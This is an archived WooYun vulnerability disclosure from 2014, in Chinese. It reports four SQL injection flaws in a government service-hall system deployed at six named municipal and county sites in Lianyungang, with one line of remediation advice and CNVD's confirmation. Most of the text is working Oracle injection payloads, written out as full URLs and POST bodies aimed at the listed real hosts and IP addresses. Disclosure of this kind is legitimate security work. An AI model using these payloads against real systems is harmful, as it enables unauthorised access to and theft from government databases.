乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-15: 细节已通知厂商并且等待厂商处理中 2014-08-20: 厂商已经确认,细节仅向厂商公开 2014-08-23: 细节向第三方安全合作伙伴开放 2014-10-14: 细节向核心白帽子及相关领域专家公开 2014-10-24: 细节向普通白帽子公开 2014-11-03: 细节向实习白帽子公开 2014-11-13: 细节向公众公开
某政务大厅系统4处SQL注射漏洞
存在漏洞的是江苏南大先腾信息产业有限公司开发的阳光政务系统官方网站:http://www.centit.com/由于没有演示站,所以对安装该系统的政务大厅进行黑盒测试测试网站:http://www.ldzsc.gov.cn/ 连云港经济技术开发区行政大厅http://218.92.49.74:8090/ganyunet/ 赣榆县政务大厅http://218.92.50.139:8082/lygdhnet/ 东海县政务大厅http://218.92.62.78/gnnet/ 灌南县政务大厅http://218.92.14.22/gynet/ 灌云县政务大厅http://61.132.0.36:8090/lygnet/ 连云港市政务大厅1.由于/apply.do页面参数applicant未安全过滤导致SQL注射漏洞2.由于/info/infomation.do页面参数no_未安全过滤导致SQL注射漏洞3.由于/itemSearch.do页面参数itemObjectId未安全过滤导致SQL注射漏洞4.由于/onlineApply.do页面参数depNo未安全过滤导致SQL注射漏洞
1.由于/apply.do页面参数applicant未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/apply.dohttp://218.92.49.74:8090/ganyunet/apply.dohttp://218.92.50.139:8082/lygdhnet/apply.dohttp://218.92.62.78/gnnet/apply.dohttp://218.92.14.22/gynet/apply.dohttp://61.132.0.36:8090/lygnet/apply.doPOST DATA:action=&applicant=1' AND 9077=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(118)||CHR(58)),CHR(36),CHR(58)||CHR(110)||CHR(58)),CHR(64),CHR(58)||CHR(101)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'IpwQ' LIKE 'IpwQ&beginDate=2014-05-17&endDate=2014-06-17&org.apache.struts.taglib.html.TOKEN=cd9aecdb8a7f835c9c096d053627c508&type=-1
2.由于/info/infomation.do页面参数no_未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.49.74:8090/ganyunet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.50.139:8082/lygdhnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.62.78/gnnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.14.22/gynet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://61.132.0.36:8090/lygnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1
3.由于/itemSearch.do页面参数itemObjectId未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.49.74:8090/ganyunet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.50.139:8082/lygdhnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.62.78/gnnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.14.22/gynet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://61.132.0.36:8090/lygnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3
4.由于/onlineApply.do页面参数depNo未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/onlineApply.do?method=initQlxmhttp://218.92.49.74:8090/ganyunet/onlineApply.do?method=initQlxmhttp://218.92.50.139:8082/lygdhnet/onlineApply.do?method=initQlxmhttp://218.92.62.78/gnnet/onlineApply.do?method=initQlxmhttp://218.92.14.22/gynet/onlineApply.do?method=initQlxmhttp://61.132.0.36:8090/lygnet/onlineApply.do?method=initQlxmPOST DATA:address=3137 Laguna Street&applicantName=yuplrdbv&appName=yuplrdbv&depNo=1' AND 9077=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(118)||CHR(58)),CHR(36),CHR(58)||CHR(110)||CHR(58)),CHR(64),CHR(58)||CHR(101)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun' LIKE 'wooyun&dep_No=&[email protected]&enterpriseCode=94102&fax=317-317-3137&itemType=1&item_id=-1&item_No=&linker=1&mobile=987-65-4329&org.apache.struts.taglib.html.TOKEN=dbdff5edec8670ee85d24b64ecd6b402&personCard=1&phone=555-666-0606&postCode=94102&sex=1&telephone=555-666-0606
对数字型的参数进行判断过滤
危害等级:高
漏洞Rank:16
确认时间:2014-08-20 10:50
CNVD确认并复现所述漏洞情况,根据测试用例已经转由CNCERT下发给江苏分中心,由其后续协调相关用户处置。
暂无